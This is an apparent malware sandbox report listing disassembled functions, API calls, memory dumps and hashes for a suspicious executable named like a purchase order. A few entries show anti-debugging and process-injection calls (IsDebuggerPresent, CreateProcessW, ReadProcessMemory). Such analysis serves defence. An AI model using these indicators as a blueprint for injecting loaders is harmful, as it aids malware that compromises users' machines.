                        • Instruction Fuzzy Hash: 62F0627191421DAE8F12FFB4D8918FFB7B8AE10340B10C567E82692182EB74DB19DF21
                        Function 002D35E7 Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        • _memmove.LIBCMT ref: 002D367B
                        • __flush.LIBCMT ref: 002D369B
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __flush__getptd_noexit_memmove
                        • String ID:
                        • API String ID: 3662107617-0
                        • Opcode ID: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                        • Instruction ID: c4d719e126532848663f8e3b707fdc55f5b434cd555c7da8cb380b4aa090155c
                        • Opcode Fuzzy Hash: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                        • Instruction Fuzzy Hash: 7D41A5B5B20706ABDF18CF69C4905AEB7A9AB44360B24853FE855C7340DB70DF608B95
                        Function 002BBBD9 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                        • Instruction ID: b3ce61c346e521b5b3dd53a0ba17906ae7b1be202227be3ea6180b3a17cd02b1
                        • Opcode Fuzzy Hash: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                        • Instruction Fuzzy Hash: 4E31B8B1620507AFC715DF29C8D1E69F7A8FF48350755822AE419CB291DFB0E874CB90
                        Function 002B3682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                        Download Yara Rule
                        APIs
                        • IsThemeActive.UXTHEME ref: 002B36E6
                          • Part of subcall function 002D2025: __lock.LIBCMT ref: 002D202B
                          • Part of subcall function 002B32DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002B32F6
                          • Part of subcall function 002B32DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002B330B
                          • Part of subcall function 002B374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 002B376D
                          • Part of subcall function 002B374E: IsDebuggerPresent.KERNEL32(?,?), ref: 002B377F
                          • Part of subcall function 002B374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe,00000104,?,00371120,C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe,00371124,?,?), ref: 002B37EE
                          • Part of subcall function 002B374E: SetCurrentDirectoryW.KERNEL32(?), ref: 002B3860
                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002B3726
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                        • String ID:
                        • API String ID: 924797094-0
                        • Opcode ID: b1bad8aa1b8451ae9e8d3cd95ac1ecbf6ee6a6ffc8c892de841c9390615af995
                        • Instruction ID: cc6977312dc9e53fc45ec0f0909e7d5f3b264bd39b6a94dd75c35603e62ce342
                        • Opcode Fuzzy Hash: b1bad8aa1b8451ae9e8d3cd95ac1ecbf6ee6a6ffc8c892de841c9390615af995
                        • Instruction Fuzzy Hash: C3115C729283419BC321EF29EC4595BBBE8FB94750F00461EF488872A1DB709998CF92
                        Function 002DF782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • ___lock_fhandle.LIBCMT ref: 002DF7D9
                        • __close_nolock.LIBCMT ref: 002DF7F2
                          • Part of subcall function 002D886A: __getptd_noexit.LIBCMT ref: 002D886A
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                        • String ID:
                        • API String ID: 1046115767-0
                        • Opcode ID: 79b5dcd5d92fc92d0d6d43ef2cc7e76f5ffd7db91faca8c5d51baeda1478c668
                        • Instruction ID: 1c77a6449224dcda6cc73331a186f263b73f60a16a58b51a8e7a34f3a45b064e
                        • Opcode Fuzzy Hash: 79b5dcd5d92fc92d0d6d43ef2cc7e76f5ffd7db91faca8c5d51baeda1478c668
                        • Instruction Fuzzy Hash: DD1125328356148ED3527F64D94234976505F42330F664362E426DF3E3CBB45D60EFAA
                        Function 002D010A Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002D45EC: __FF_MSGBANNER.LIBCMT ref: 002D4603
                          • Part of subcall function 002D45EC: __NMSG_WRITE.LIBCMT ref: 002D460A
                          • Part of subcall function 002D45EC: RtlAllocateHeap.NTDLL(01670000,00000000,00000001,?,?,?,?,002D0127,?,002B125D,00000058,?,?), ref: 002D462F
                        • std::exception::exception.LIBCMT ref: 002D013E
                        • __CxxThrowException@8.LIBCMT ref: 002D0153
                          • Part of subcall function 002D7495: RaiseException.KERNEL32(?,?,002B125D,00366598,?,?,?,002D0158,002B125D,00366598,?,00000001), ref: 002D74E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                        • String ID:
                        • API String ID: 3902256705-0
                        • Opcode ID: 31086af4028b6ee8b280cfad77689e1056ba706a5255ccb4ee2a15363f56fc72
                        • Instruction ID: 435a2e888821942bc321c0b906d204f8b8e5a6b41dd13b709c57288bafd6b77f
                        • Opcode Fuzzy Hash: 31086af4028b6ee8b280cfad77689e1056ba706a5255ccb4ee2a15363f56fc72
                        • Instruction Fuzzy Hash: 14F0C83911420EA6C716BFA8ED42ADE77ECAF04350F104457F909D2391DBB0DEB09AA5
                        Function 002D4274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        • __lock_file.LIBCMT ref: 002D42B9
                          • Part of subcall function 002D5A9F: __lock.LIBCMT ref: 002D5AC2
                        • __fclose_nolock.LIBCMT ref: 002D42C4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                        • String ID:
                        • API String ID: 2800547568-0
                        • Opcode ID: a882d12dff9564306fec9ce07294681dfab9aa205291db3d32d9074eb969fd01
                        • Instruction ID: c4846382ebe1506ba206997dd59e3b74b9e6225f1c4afc40472d90781c6c8737
                        • Opcode Fuzzy Hash: a882d12dff9564306fec9ce07294681dfab9aa205291db3d32d9074eb969fd01
                        • Instruction Fuzzy Hash: DBF06D318256159BE711BB75880A75E67D06F40324F61820BB864AB3C5DBBC9E219F51
                        Function 03BC129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessW.KERNEL32(?,00000000), ref: 03BC1A5B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03BC1AF1
                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 03BC1B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                        • Instruction ID: 4fa8abe49598e2a912a90b9553488f0ca1caae9a6a04fea2adc8486568871b5c
                        • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                        • Instruction Fuzzy Hash: 7012BD24A24658C6EB24DF64D8507DEB232EF68300F1094ED910DEB7A5E77A4F81CF5A
                        Function 002BB6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: f9de2584038e82857e55239d0d003e15f54d771caa855f22807268af4f72ed59
                        • Instruction ID: 2164f019fa74052295d863acd8a1ab7259f559ea264607a4698b63fac57e90ec
                        • Opcode Fuzzy Hash: f9de2584038e82857e55239d0d003e15f54d771caa855f22807268af4f72ed59
                        • Instruction Fuzzy Hash: E041C37A210602DFC715DF19D491AA2F7F0FF883A0714C42ED99A87761DBB0E861DB50
                        Function 0032AA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 5c3b0bb0035263e240438783ec4503e679530e6c78a21396fbb9bbb38a4a68a3
                        • Instruction ID: 18a3bb8c2636d9cb575a28210fb66da484e4185b26d733a71ea3a9139a3bea3b
                        • Opcode Fuzzy Hash: 5c3b0bb0035263e240438783ec4503e679530e6c78a21396fbb9bbb38a4a68a3
                        • Instruction Fuzzy Hash: F2415870514651CFEB25CF18C484F1ABBE1BF49308F19869CE99A4B362C372E895CF52
                        Function 002BBD71 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 060ef39270eae4f330e37bb9a999863f574ba651c1b05bae9951fa4e80cc6389
                        • Instruction ID: b7935b5e814c601d9df563574f5a64bad30b2322c5fdc3df8bde13e493237af5
                        • Opcode Fuzzy Hash: 060ef39270eae4f330e37bb9a999863f574ba651c1b05bae9951fa4e80cc6389
                        • Instruction Fuzzy Hash: 99210871620A19FBCF164F11FC4276ABBB8EF15790F21C52DE486C50A0EBB095E0CB55
                        Function 002B3F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B3F5D: FreeLibrary.KERNEL32(00000000,?), ref: 002B3F90
                          • Part of subcall function 002D4129: __wfsopen.LIBCMT ref: 002D4134
                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002B34E2,?,00000001), ref: 002B3FCD
                          • Part of subcall function 002B3E78: FreeLibrary.KERNEL32(00000000), ref: 002B3EAB
                          • Part of subcall function 002B4010: _memmove.LIBCMT ref: 002B405A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Library$Free$Load__wfsopen_memmove
                        • String ID:
                        • API String ID: 1396898556-0
                        • Opcode ID: 8d3b1528f36cb1075ef148200f49ab1dc08dda10f56b493cd65203f3bd50a12f
                        • Instruction ID: 101dbce350a11b867e5b1084dea174e82658fb4a108560e94ce5076cda4d3cc1
                        • Opcode Fuzzy Hash: 8d3b1528f36cb1075ef148200f49ab1dc08dda10f56b493cd65203f3bd50a12f
                        • Instruction Fuzzy Hash: A311E731630219BACB15FB64DC53FDD76A59F50780F108829F545E6182DBB0EF649F50
                        Function 0032AB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 08f2e4831abc79a0e1a31dee98e28e61dd066d33849e42c86990440bc81e4d8e
                        • Instruction ID: a6f4799b09c6cf594b87960df5e333dd690efdb0bc1cb2319176558bc74feb30
                        • Opcode Fuzzy Hash: 08f2e4831abc79a0e1a31dee98e28e61dd066d33849e42c86990440bc81e4d8e
                        • Instruction Fuzzy Hash: 3F214670118601CFD724DF25C484F1ABBE1BF89304F154A6CE99A4B222C331E8A5CF52
                        Function 002DBD14 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • ___lock_fhandle.LIBCMT ref: 002DBD73
                          • Part of subcall function 002D886A: __getptd_noexit.LIBCMT ref: 002D886A
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __getptd_noexit$___lock_fhandle
                        • String ID:
                        • API String ID: 1144279405-0
                        • Opcode ID: e5bf5d6816d7e98889b81d904831cb121771ef6ade3b83ad2fa7a0939099b159
                        • Instruction ID: 36ee6962de8b4789fc87220c98765bf601ccd35782560f3e78096e1a6fb0afd4
                        • Opcode Fuzzy Hash: e5bf5d6816d7e98889b81d904831cb121771ef6ade3b83ad2fa7a0939099b159
                        • Instruction Fuzzy Hash: E511CE32834658DFD7137F64C8563597A626F42331F960242E5644F3E2DBF88D609F61
                        Function 002D373E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                        Download Yara Rule
                        APIs
                        • __lock_file.LIBCMT ref: 002D377D
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __getptd_noexit__lock_file
                        • String ID:
                        • API String ID: 2597487223-0
                        • Opcode ID: 159b3439ffda6790819efbedc90ccdb3c6232d21cc6ba74ad9a735704e45ba17
                        • Instruction ID: e10e539877118a854446a1123daf27500e2fe5c46e8ce02dfa6b88debb36f25d
                        • Opcode Fuzzy Hash: 159b3439ffda6790819efbedc90ccdb3c6232d21cc6ba74ad9a735704e45ba17
                        • Instruction Fuzzy Hash: 1DF062B1520616AAEF21EF74CC067DEB6A0AF04310F548516F4149A391E7B98F70DF92
                        Function 002B3E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                        Download Yara Rule
                        APIs
                        • FreeLibrary.KERNEL32(?,?,?,?,?,002B34E2,?,00000001), ref: 002B3E6D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: FreeLibrary
                        • String ID:
                        • API String ID: 3664257935-0
                        • Opcode ID: 9eba7a00996c2024502e0e651228b7533cf7d1ac383e488372579b1f32899e7d
                        • Instruction ID: f25365556d1cdb4d14a44b04d9ced1617ca388f4622d4df66faaf958ac612d1d
                        • Opcode Fuzzy Hash: 9eba7a00996c2024502e0e651228b7533cf7d1ac383e488372579b1f32899e7d
                        • Instruction Fuzzy Hash: C9F0A972020302CFCB34DF24D490892BBE0AF047653248A3FE5C682622C731D968CF00
                        Function 002D4129 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __wfsopen
                        • String ID:
                        • API String ID: 197181222-0
                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction ID: dcfe8c6549463ceb0cf7df8cd9590ccf6bbff4d338f31424707c95f4c79f99ff
                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction Fuzzy Hash: A7B0927244030C77CE012A82EC02A493B19AB50664F008021FB0C18261A673EAB09A89
                        Function 002CF92C Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction ID: 656b939e4bbc86a2a1daa5d483d10466af30c90c5dda3009491c250845b76d8d
                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction Fuzzy Hash: AA31D671A10106ABCB98DF58D680F69FBA6FB49300B2487A9E44ACB355D731EDD1CBC0
                        Function 03BC22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction ID: 14f83a35c9c3b3c73196fa06fec74561ef5e7d685a2a8002a6749a6fcd8aa3fc
                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction Fuzzy Hash: 9BE0E67494020EDFDB00EFB8D54969E7FB4EF04301F1005A5FD01D6280D6309D508A72

                        Non-executed Functions

